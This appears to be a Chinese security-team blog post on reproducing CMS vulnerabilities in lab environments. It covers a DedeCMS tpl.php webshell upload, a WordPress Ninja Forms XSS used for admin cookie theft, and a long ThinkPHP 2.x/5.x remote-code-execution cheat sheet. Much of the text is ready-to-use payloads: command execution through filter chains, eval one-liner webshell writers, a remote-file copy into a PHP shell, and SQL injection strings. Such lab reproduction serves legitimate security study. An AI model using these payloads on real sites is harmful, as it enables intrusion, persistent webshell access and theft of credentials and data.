CMS漏洞复现

Dedecms v5.7 sp2版本tpl.php存在代码执行漏洞，可以利用该漏洞在增加的新的标签中上传木马。开启PHP study，创建数据库，通过网页访问搭建环境，因为是后台漏洞，所以登陆到后台，构造payload成功写入木马，之后连接中国蚁剑，可以控制网站部分权限。漏洞复现的目的是学会哪些地方容易有漏洞，应该怎么处理发现的漏洞。
XSS

XSS攻击通常指的是通过利用网页开发时留下的漏洞，通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。下载wordpress，同时还要下载对应版本的插件Ninja Forms，这个漏洞是基于Ninja Forms 3.3.17插件上的漏洞，创建数据库来存放数据，在浏览器输入连接地址，根据自己的路径来进行相应的修改，使用方法直接复制到浏览器就可以触发XSS，可得到弹窗。

之后先注册登录XSS平台，在我的项目中创建一个项目，复制XSS payload代码，在原路径中修改，可得到项目中的内容，查看xss,得到管理员的cookie进行免密登录。

CVE漏洞：

OpenSSH命令注入漏洞复现(CVE-2020-15778)
	
F5 BIG-IP TMUI远程代码执行漏洞复现(CVE-2020-5902)
	
Apache Tomcat AJP文件包含漏洞复现(CVE-2020-1938)
	
DNS Server远程代码执行漏洞复现(CVE-2020-1350)
	
SMBv3远程代码执行漏洞复现(CVE-2020-0796)
	
Exchange Server反序列化漏洞复现(CVE-2020-0688)
	
sudo提权漏洞(CVE-2019-14287)
	
Nginx PHP 远程代码执行漏洞复现(CVE-2019-11043)
	
域内提权漏洞复现(CVE-2019-1040)
	
RDP远程桌面漏洞复现(CVE-2019-0708)
	
IE双杀漏洞复现(CVE-2018-8174)
	
Winrar漏洞复现(CVE-2018-20250)
	
Tomcat PUT方法任意文件上传(CVE-2017-12615)
	
Supervisord远程命令执行漏洞(CVE-2017-11610)
	
PHPMailer远程命令执行漏洞复现(CVE-2016-10033)
	
Tomcat反序列化漏洞(CVE-2016-8735)
	
Shiro1.2.4反序列化漏洞复现(Shiro550，CVE-2016-4437)
	
Apache ActiveMQ任意文件写入漏洞复现(CVE-2016-3088)
	
Weblogic SSRF漏洞(CVE-2014-4210)
	
ElasticSearch远程代码执行漏洞复现(CVE-2014-3120/CVE-2015-1427)
	
MS08_067漏洞复现(CVE-2008-4250)
其他漏洞：

JAVA反序列化系列漏洞复现
	
Redis未授权访问漏洞
	
Jenkins反序列化漏洞复现
	
Tomcat管理页面弱口令页面Getshell
	
利用Blind XXE Getshell(Java网站)
	
通达OA低版本文件上传+apache解析漏洞getshell
	
通达OA命令执行漏洞复现(文件上传+文件包含)
	
phpmyadmin爆破和后台getshell
	
FCKeditor编辑器漏洞
	
Apache Tomcat examples directory vulnerabilities(Apache Tomcat样例目录session操纵漏洞)复现
	
易酷CMS2.5本地文件包含漏洞复现
	
Wordpress主题编辑器漏洞复现
	
PHPCMS V9.6.0任意文件上传漏洞
 

 

 

漏洞复现-看起来就好难的样子，果然就是这样

复现CMS漏洞的意义是什么呢？

1.从实际操作中了解哪种CMS有哪种漏洞，为之后的漏洞挖掘积累经验

2.把做CTF题的经验与实际结合起来，学有所用

3.熟能生巧，练的多了碰到实际情况时才不会无从下手
什么是CMS？
CMS是“Content Management System”的缩写，意为“内容管理系统”。网站的开发者为了方便，制作了不同种类的CMS，可以加快网站开发的速度和减少开发的成本。
常见的CMS：

php类cms系统：dedecms、帝国cms、php168、phpcms、cmstop、discuz、phpwind等

asp类cms系统：zblog、KingCMS等

国外的著名cms系统：joomla、WordPress 、magento、drupal 、mambo。
怎么复现漏洞？
复现漏洞的第一步就是环境搭建，然后就是找到漏洞点，分析漏洞形成的原因，实现get shell或者获得其他的权限
DedeCMS-V5.7-UTF8-SP2

先安装好DEDECMS

1.

2.

3.

4.



这个环境就搭好了，这个漏洞属于后台漏洞。先登录进去，DeDeCMS默认后台路径是/uploads/dede，

账户密码默认都是admin



已知在tpl.php存在代码执行漏洞，我们在本地的phpstudy的WWW文件中搜索tpl.php
tpl.php里面有代码执行漏洞，涉及到代码审计–这方面挺难。下面我们来找到tpl.php中存在漏洞的地方，我们再去tpl.php里看一下，发现action的参数有很多，比del，edit，upload等等，但只有传入upload的时候页面才会回显正常，而其他的都会显示token异常，所以只能通过action=upload来获取token，查看页面源代码



然后访问http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/tpl.php?action=upload



查看源代码，看到一个token值



所以构造payload如下

域名+/tpl.php?action=savetagfile&token=&filename=abc.lib.php&content=<?php @eval($_POST['abc'])?>

发现成功写入

然后我们就可以用菜刀或者蚁剑进行连接

首先我们要找到这个名为abc的php文件查看地址

![在这里插入图片描述](https://img-blog.csdnimg.cn/20190721222402507.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzNjEzMTQ0,size_16,colo

地址后面写的就是我们所写的那句话中POST里面的



这就ok了，可以查看各个目录也能进行删改


Wordpress (CVE-2018-19287)

漏洞简介

这个漏洞是基于Ninja Forms 3.3.17插件上的漏洞，Ninja Forms是WordPress的终极免费表单创建工具
环境搭建

先去官网下载相应版本的wordpress，网址：https://cn.wordpress.org/download/releases/

这里我们下载4.4版本。

同样的还要下载对应版本的插件，网址：https://downloads.wordpress.org/plugin/ninja-forms.3.3.17.zip

下载完后要把插件解压到/wp-content/plugins目录下，里面存放的都是wp的插件。

需要自己添加一个数据库来存放数据，在命令行里面使用命令CREATE DATABASE 数据库名;

或者也可以用原本存在的数据库test也可以
进入wordpress



提交以后




进入以后


点击启用。

至此 ，就完成了这个框架的使用

ThinkPHP 2.x/5.0.x/5.1.x/5 in-sqlinjection 命令执行漏洞
基础知识
漏洞原理
涉及版本
漏洞payload梳理（ThinkPHP 5.1.0-5.1.23/5.1.* ）
漏洞复现
ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP <=5.0.23 远程代码执行漏洞
ThinkPHP  5.0.20 远程代码执行漏洞
ThinkPHP5 in-sqlinjection
参考资料

基础知识
  ThinkPHP是一个免费开源的，快速、简单的面向对象的轻量级PHP开发框架，是为了敏捷WEB应用开发和简化企业应用开发而诞生的。ThinkPHP从诞生以来一直秉承简洁实用的设计原则，在保持出色的性能和至简的代码的同时，也注重易用性。
  模块：thinkphp 所有的主入口文件默认访问index控制器

  方法：thinkphp 所有的控制器默认执行index动作

  构造：http://IP/index.php（或者其它应用入口文件）？s=/模块/控制器/操作/[参数名/参数值…]
漏洞原理
ThinkPHP 2.x 任意代码执行漏洞：

  就是在thinkphp的类似于MVC的框架中，存在一个Dispatcher.class.php的文件，它规定了如何解析路由，在该文件中，存在一个函数为static public function dispatch()，此为URL映射控制器，是为了将URL访问的路径映射到该控制器下获取资源的，而当我们输入的URL作为变量传入时，该URL映射控制器会将变量以数组的方式获取出来，从而导致漏洞的产生。

ThinkPHP <=5.0.23 远程代码执行漏洞：

  ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

ThinkPHP 5.0.20 远程代码执行漏洞：

  由于没有正确处理控制器名，导致在网站没有开启强制路由的情况下（即默认情况下）可以执行任意方法，从而导致远程命令执行漏洞。

ThinkPHP5 in-sqlinjection：

  控制了in语句的值位置，即可通过传入一个数组，来造成SQL注入漏洞。
涉及版本

ThinkPHP 2.x

ThinkPHP <=5.0.23

ThinkPHP =5.0.20

ThinkPHP5

漏洞payload梳理（ThinkPHP 5.1.0-5.1.23/5.1.* ）

  执行流程：发起请求->路由检测->获取pathinfo信息->路由匹配->路由解析->获得模块、控制器、操作方法调度信息->路由调度->解析模块和类名->组建命名空间>查找并加载类->实例化控制器并调用操作方法->构建响应对象->响应输出->日志保存->程序运行结束
  漏洞原因：路由控制不严谨，默认不开启强制路由，从而可以任意调用Thinkphp的类库
  漏洞思路：

            1.因为Request类的method和__construct方法造成的RCE

            2.因为Request类在兼容模式下获取的控制器没有进行合法校验导致的RCE

ThinkPHP 5.1.x ：

?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id


ThinkPHP 5.0.x ：

?s=index/think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件
?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami


还有一种：

http://php.local/thinkphp5.0.5/public/index.php?s=index
post
_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
_method=__construct&filter[]=system&method=GET&get[]=whoami


ThinkPHP <= 5.0.13：

POST /?s=index/index
s=whoami&_method=__construct&method=&filter[]=system


ThinkPHP <= 5.0.23、5.1.0 <= 5.1.16 需要开启框架app_debug：

POST /
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls -al


ThinkPHP <= 5.0.23 需要存在xxx的method路由，例如captcha：

POST /?s=xxx HTTP/1.1
_method=__construct&filter[]=system&method=get&get[]=ls+-al
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls

  可以看到payload分为两种类型，一种是因为Request类的method和__construct方法造成的，另一种是因为Request类在兼容模式下获取的控制器没有进行合法校验。

（1）thinkphp5 method任意调用方法导致rce
ThinkPHP 5.0（debug 无关）：
命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami

写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

ThinkPHP 5.0.1-5.0.13（debug 无关）：

命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami

写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

ThinkPHP 5.0.13 补充（有captcha路由时无需debug=true）：

命令执行
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET

ThinkPHP 5.0.14-5.0.20（默认debug=false，需要开启debug）：

命令执行
POST ?s=index/index
s=whoami&_method=__construct&method=POST&filter[]=system
aaaa=whoami&_method=__construct&method=GET&filter[]=system
_method=__construct&method=GET&filter[]=system&get[]=whoami
c=system&f=calc&_method=filter

写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET

ThinkPHP 5.0.21-5.0.23（默认debug=false，需要开启debug）：

命令执行
POST ?s=index/index
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc

写shell
POST
_method=__construct&filter[]=assert&server[REQUEST_METHOD]=file_put_contents('Y4er.php','<?php phpinfo();')

有captcha路由时无需debug=true
POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&server[REQUEST_METHOD]=calc&method=get

ThinkPHP 5.0.24作为5.0.x的最后一个版本，rce被修复

ThinkPHP 5.1.0-5.1.1（默认debug为true）

命令执行
POST ?s=index/index
_method=__construct&filter[]=system&method=GET&s=calc

写shell
POST
s=file_put_contents('Y4er.php','<?php phpinfo();')&_method=__construct&method=POST&filter[]=assert

有captcha路由时无需debug=true
"topthink/think-captcha": "2.*"

POST ?s=captcha/calc
_method=__construct&filter[]=system&method=GET
POST ?s=captcha
_method=__construct&filter[]=system&s=calc&method=get

基于__construct的payload大部分出现在5.0.x及低版本的5.1.x中
（2）未开启强制路由导致rce
命令执行
5.0.x
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
5.1.x
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

写shell
5.0.x
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
5.1.x
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\view\driver\Think/display&template=<?php phpinfo();?>             //shell生成在runtime/temp/md5(template).php
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)

其他
5.0.x
?s=index/think\config/get&name=database.username // 获取配置信息
?s=index/\think\Lang/load&file=../../test.jpg    // 包含任意文件
?s=index/\think\Config/load&file=../../t.php     // 包含任意.php文件

修复
// 获取控制器名
$controller = strip_tags($result[1] ?: $config['default_controller']);

if (!preg_match('/^[A-Za-z](\w|\.)*$/', $controller)) {
	throw new HttpException(404, 'controller not exists:' . $controller);
}

漏洞复现

  前情提要：云主机作为攻击方，云主机内部靶场镜像开启相应的漏洞容器作为受害方。
  前情提要：注意要点，对数据包进行修改时，对于需要把“GET”包修改为“POST”包时一定要注意，使用burpsuite自带的请求转换“change request method”，若直接修改请求头可能出现攻击不成功的可能，需要添加字段Content-Type: application/x-www-form-urlencoded

ThinkPHP 2.x 任意代码执行漏洞
ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由：
$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));

导致用户的输入参数被插入双引号中执行，造成任意代码执行漏洞。
访问页面：

拼接查看
// phpinfo敏感文件
/index.php?s=/index/index/xxx/${@phpinfo()}


上传小马，菜刀连接：
// 连接密码为“1”可以修改
/index.php?s=a/b/c/${@print(eval($_POST[1]))}





ThinkPHP <=5.0.23 远程代码执行漏洞
// payload
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

在云主机开启靶场，访问页面，如下：


（1）执行新建文件夹
// 新建文件夹test
touch test



查看是否成功



（2）还可以使用echo写入带内容的文件
// 博主尝试写入一句话失败了，想着应该是有些限制
echo ‘I am a boy’ >> ./test.txt


ThinkPHP  5.0.20 远程代码执行漏洞
（1）直接进行URL拼接，phpinfo页面：
// 拼接
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1` and it'll execute the phpinfo：



（2）直接进行URL拼接，命令执行：
// 命令"id"可更改
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=id



（3）换一种方式，写shell执行：
// POST内的可以更改
/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[a]);?>



ThinkPHP5 in-sqlinjection
// 爆出用户名密码
http://IP/index.php?ids[]=1&ids[]=2


// 错误回显敏感信息，数据库名
http://IP/index.php?ids[0,updatexml(0,concat(0xa,user()),0)]=1



  预编译的确是mysql服务端进行的，但是预编译的过程是不接触数据的 ，也就是说不会从表中将真实数据取出来，所以使用子查询的情况下不会触发报错；虽然预编译的过程不接触数据，但类似user()这样的数据库函数的值还是将会编译进SQL语句，所以这里执行并爆了出来。
参考资料

https://www.cnblogs.com/cute-puli/p/13285528.html

https://www.cnblogs.com/0xdd/p/10848746.html

https://github.com/SkyBlueEternal/thinkphp-RCE-POC-Collection

https://www.secpulse.com/archives/59120.html

https://www.leavesongs.com/PENETRATION/thinkphp5-in-sqlinjection.html

https://y4er.com/post/thinkphp5-rce/


ERRORS团队





    ERRORS团队源于网络空间安全的兴趣爱好者共同组建，致力于从网络安全的各个层面维护国家网络空间安全，团队成员拥有专业的渗透测试技术、安全评估能力、逆向分析技巧以及丰富的项目经验和实战经验。该团队是一支年轻的有生命力的团队，旨在通过知识分享、技术探讨提升网络安全意识和专业技能。




加入我们：
ERRORS团队主页：  https://www.sentrylab.cn/
盒子团队申请：      https://www.vulbox.com/team/ERRORS
或者邮件联系：      chihou.pro@gmail.com